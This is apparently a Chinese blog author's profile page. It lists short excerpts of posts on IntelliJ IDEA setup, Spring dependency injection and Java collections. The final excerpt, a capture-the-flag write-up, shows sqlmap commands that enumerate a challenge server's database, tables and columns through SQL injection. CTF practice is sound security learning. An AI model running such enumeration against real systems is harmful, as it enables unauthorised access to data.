自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 idea模版设置

【代码】idea模版设置。

2024-04-06 10:14:37 140

原创 idea2023安装后双击图标无反应

2.替换C:\Users\13058\AppData\Roaming\JetBrains\IntelliJIdea2023.2文件夹下的同名文件,这个文件夹是隐藏的,需要打开隐藏的项目。1.右键idea图标,打开文件所在位置,复制idea64.exe.vmoptions这个文件。猜测原因:以前装过idea的破解版,在C盘里面残留有以前的idea配置。

2024-03-05 23:41:10 415

原创 IDEA设置(2023版)

好用插件。

2024-03-05 22:01:00 529

原创 Spring笔记

mg9b。

2024-03-05 21:23:38 380

原创 Spring控制反转(IoC)的实现方式:依赖注入

依赖注入包括:set注入和构造方法注入。

2024-03-05 21:19:51 330

原创 Spirng设计思想

当进行系统功能扩展的时候,如果动了之前稳定的程序,修改了之前的程序,之前所有程序都需要进行重新测试。(对象之间关系的维护权,我也不管了,交出去了。* 控制反转思想的实现方式有多种,其中比较重要的叫做:依赖注入(Dependency Injection,简称DI)。反之,如果在扩展系统功能的时候,你修改了之前的代码,那么这个设计是失败的,违背OCP原则。依赖注入:对象A和对象B之间的关系,靠注入的手段来维护。* OCP原则是最核心的,最基本的,其他的六个原则都是为这个原则服务的。“注入”是什么意思?

2024-03-05 10:49:46 333

原创 JAVA_集合

一、 集合框架图单列集合双列集合二、单列接口(collection接口)三、双列结合(map接口)四、collections工具类(处理各种集合对象的静态方法)

2024-02-22 17:19:28 313

原创 IDEA Dubug时,各个按钮的作用

2024-02-18 14:22:12 336

原创 [SWPUCTF 2021 新生赛]easy_sql

sqlmap -u http://node5.anna.nssctf.cn:28972/?wllm=1 --current-dbsqlmap -u http://node5.anna.nssctf.cn:28972/?wllm=1 -D 'test_db' --tablessqlmap -u http://node5.anna.nssctf.cn:28972/?wllm=1 -D 'test_db' -T 'test_tb' --columnssqlmap -u http://node5.anna.nssc

2023-10-14 22:22:09 60

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除